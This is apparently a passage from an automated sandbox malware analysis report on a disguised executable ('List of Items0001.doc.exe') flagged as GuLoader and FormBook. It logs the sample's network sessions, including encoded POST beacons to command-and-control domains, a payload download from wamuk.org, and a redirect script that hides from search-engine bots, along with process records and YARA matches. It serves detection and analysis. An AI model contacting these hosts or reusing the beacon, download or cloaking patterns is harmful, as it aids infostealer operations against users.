                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaABaZYnOUsoDotElsORQoBLnstTPj7mkYLDVFR75gjrTipF+TTXL1Z3iZhcpQwgl/lStaONt9Z1iE1p2x4gNoaPGkbBY8168vJZVfOXLbjRWtkHVgtoRTtRJceGNT9+kOu83DiKN3q8K3ciMsYTcPGWpK5DlJLr9XzEzG+2gAkdFTJQ=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              68 | 192.168.11.30 | 49962 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:45.760525942 CEST | 2578 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY= [TRUNCATED]
                                              Sep 24, 2024 11:30:45.760596037 CEST | 1347 | OUT
                                              Data Ascii: l3c92sFT985kVv6beBV59eR550J3HPmwymhFt8bFK+pMDZyY2Kr2amTnDyGVdWGEyuSbyIfYm6dM8+OTnSLpHSrU7lWOqEgGLR3E7383LUPJJ0cisRbKh20F2U/7x7FtXwiStWX5ocO7IEZ1ov8kHwcHiKBWe3Su5/e+vQb8Pch7uggK3NK3gPdvdb9t+RoyjYbRKxaoYogU8XJrQ3GZXpc9/GMJ2QNQgN8rcQC4825CQqCifkk


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              69 | 192.168.11.30 | 49963 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:48.397658110 CEST | 501 | OUT | GET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:48.502226114 CEST | 390 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:30:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s="}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              70 | 192.168.11.30 | 49964 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:31:01.855554104 CEST | 770 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=6dvVVX/18e5LL2XPS8IXhNdkn+LW1c7bxB+/c9IhV/k4477le3mGVvBF9l4jxrJfPAg9MrtQJOgpuRqns4IZQwL2F45LT9sW3gQZJxzHU6Sv4q/k5vNVMgNM2RxkcpCRuoqUDgcEU+q+5go4G2lV67i3rCgXvj3y1X6AcpzjdwpZ1ixo+EIgQ5iQ42XT5c4SNw==
                                              Sep 24, 2024 11:31:02.009377956 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 499
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:01 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              71 | 192.168.11.30 | 49965 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:31:04.541949034 CEST | 790 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNA4/bLldySGYPBFlV4i8LITPAk1MpJQJKApuUOnvLQWRgLOOY5NcdsW3gQZJx2oU6Kv7bvk5NlWFANL/xxkWJCVuoq2DhAuU9S+5h44IDFWvriLligZuwm52keyVbm5Th9S5VAyjH8iDZe9k3677e5JQ2nAfsmzIc+sZTfiJKw+2OU=
                                              Sep 24, 2024 11:31:04.704819918 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 498
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:04 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              72 | 192.168.11.30 | 49966 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:31:07.230856895 CEST | 1289 | OUT | POST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNI4/qrlfV+GXvBFo14Z8LJJPAcxMp1qJMMpvySnq6QWfgLOB45IT9tO3gAdJxmoU6Kv7Ynk7fNWDANM2RxocpC9uracDhEUU+y+4Sw4IwtWvriLsCgJuwq82kGuVeDMSQJSpxso2jMDQJSfhE26ss53fnXDSM+QHPucR1bcdaM/rKVBOb2yNN2FrnlYdz+ALGPQTVN3BFh3/P280/gL4m5NDJgs6DaDzWLVpmkyXUsTSAVyr+aHcMHmdsCLfrurSjndLoP8uPOuPkYz2LyNViyZC0zET+LnuL10F2QDrKzRTQRIS5MA5+HyDSbWD056AmWz4yP3hF6yf0oZVZjXuoPK9OZ2KI1SUIOEk+INWSeW0LZ9QyEicdhpl1uD3eDt2R9e3Iz4rWwe9MKd8pF47/XadEGRPycbhDLQwTSNgGlVOadlStNtRpIiPiHz5XQv4IRScHMhH+2KWQhGeJyMYMDtRdLO5HgN30ScQTY8DNoVX71YM07yUYY9Roepd47re0o2aRG4/ZkeORO7gVmK2HKtEwY6fg1VrTWZWFrjT0WbyVGEmCkHPkNvtXYsEule1wLqAC/L4x3abJRjv2KOziEEBLVoIxCNr3e6u3F5iEcZwfDYI4XHlQbjgn3NCo6D7KvzV0X0HnI6bxWmJReW68/ZBk5r3Gse0d
                                              Sep 24, 2024 11:31:07.230916023 CEST | 2618 | OUT
                                              Data Ascii: YaIVZ6JNryWG/L99vrUBDqeVjl47IwUaYn8FjA0WFDRPZj+Wekn7xprNVhp+cCAPhwIyXXwUs3rtPtgv7cOsn1/HF7DVg2QCcmmf1HIbvb+3GREQKtsNBJ4NB6z5IX5w01tZ+EGEGhDS+mZIV6egbDS82r6EBGAVZ0gNA8NzNTGV8dXK+CWVzngED8EXuCrtHZLAFYEqA3waHQUouxUy5lav4SHVpO4oWoVZgyVU0FPH16EM4IL
                                              Sep 24, 2024 11:31:07.388753891 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 497
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:07 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              73 | 192.168.11.30 | 49967 | 172.81.61.224 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:31:09.912312031 CEST | 495 | OUT | GET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:31:10.066571951 CEST | 730 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 496
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:09 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              74 | 192.168.11.30 | 49968 | 134.119.247.136 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:31:15.279637098 CEST | 773 | OUT | POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=/hCTf0qw35oq0t4d2D1cxnXkuzidaKHw8tDBd2k7qzNuagMYWkLE7laEHHfPutzmpG6Svjl8DmqEU+DmTihUw5rLv9fMBLTRttmCatMc1krIzhQOK4hzdInQJ74t11cxY0RXp2+GYyqOFuLnVO7Zf+QBt+jQ1I86F3A/eRBSkD45eM7p/oSpudPg419N3vM4/A==
                                              Timestamp: Sep 24, 2024 11:31:15.473572016 CEST; Bytes transferred: 401; Direction: IN; Data:
                                              HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID: 75; Source IP: 192.168.11.30; Source Port: 49969; Destination IP: 134.119.247.136; Destination Port: 80; PID: 4076; Process: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp: Sep 24, 2024 11:31:18.018513918 CEST; Bytes transferred: 793; Direction: OUT; Data:
                                              POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrB5uaB8YRVLE4laEMnfOgNztpGmwvhx8DmuEU+zmTRYCxprJjdfCPrTRttmCatY61nbI0RMOLdVyDYnTML4tklc1Y0RlpyfTYwSOFv7nV/7aW+QHjeizjLhxET89Ywh1sg5AfbKzirmr99zNk0Ql1tNjiK34xMZM3QMcrBJcJ5eZlAA=
                                              Timestamp: Sep 24, 2024 11:31:18.214925051 CEST; Bytes transferred: 401; Direction: IN; Data:
                                              HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:18 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID: 76; Source IP: 192.168.11.30; Source Port: 49970; Destination IP: 134.119.247.136; Destination Port: 80; PID: 4076; Process: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp: Sep 24, 2024 11:31:20.750449896 CEST; Bytes transferred: 3910; Direction: OUT; Data:
                                              POST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Timestamp: Sep 24, 2024 11:31:20.946923971 CEST; Bytes transferred: 401; Direction: IN; Data:
                                              HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:20 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip


                                              Session ID: 77; Source IP: 192.168.11.30; Source Port: 49971; Destination IP: 134.119.247.136; Destination Port: 80; PID: 4076; Process: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp: Sep 24, 2024 11:31:23.479537964 CEST; Bytes transferred: 496; Direction: OUT; Data:
                                              GET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Timestamp: Sep 24, 2024 11:31:23.672920942 CEST; Bytes transferred: 382; Direction: IN; Data:
                                              HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:23 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 196
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session ID: 0; Source IP: 192.168.11.30; Source Port: 49892; Destination IP: 162.213.195.46; Destination Port: 443; PID: 8044; Process: C:\Users\user\Desktop\List of Items0001.doc.exe
                                              Timestamp: 2024-09-24 09:25:42 UTC; Bytes transferred: 171; Direction: OUT; Data:
                                              GET /css/NxTelX253.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: wamuk.org
                                              Cache-Control: no-cache
                                              Timestamp: 2024-09-24 09:25:42 UTC; Bytes transferred: 223; Direction: IN; Data:
                                              HTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:25:42 GMT
                                              Server: Apache
                                              Last-Modified: Tue, 24 Sep 2024 03:01:01 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 286272
                                              Connection: close
                                              Content-Type: application/octet-stream



                                              Target ID:0
                                              Start time:05:25:16
                                              Start date:24/09/2024
                                              Path:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\List of Items0001.doc.exe"
                                              Imagebase:0x400000
                                              File size:632'024 bytes
                                              MD5 hash:6D3DA95A3E1F5861A54C30DD61F80C02
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.674050583045.0000000004F78000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:05:25:33
                                              Start date:24/09/2024
                                              Path:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\List of Items0001.doc.exe"
                                              Imagebase:0x400000
                                              File size:632'024 bytes
                                              MD5 hash:6D3DA95A3E1F5861A54C30DD61F80C02
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.674206863103.0000000001768000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:05:25:51
                                              Start date:24/09/2024
                                              Path:C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe"
                                              Imagebase:0xcf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:05:25:52
                                              Start date:24/09/2024
                                              Path:C:\Windows\SysWOW64\TapiUnattend.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\TapiUnattend.exe"
                                              Imagebase:0x3e0000
                                              File size:12'800 bytes
                                              MD5 hash:D5BFFD755F566AAACB57CF83FDAA5CD0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:05:26:05
                                              Start date:24/09/2024
                                              Path:C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe"
                                              Imagebase:0xcf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:05:26:18
                                              Start date:24/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6a9e20000
                                              File size:675'744 bytes
                                              MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:05:31:32
                                              Start date:24/09/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff6166a0000
                                              File size:4'849'904 bytes
                                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false


                                                Execution Graph

                                                Execution Coverage:19.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:15.8%
                                                Total number of Nodes:1617
                                                Total number of Limit Nodes:39
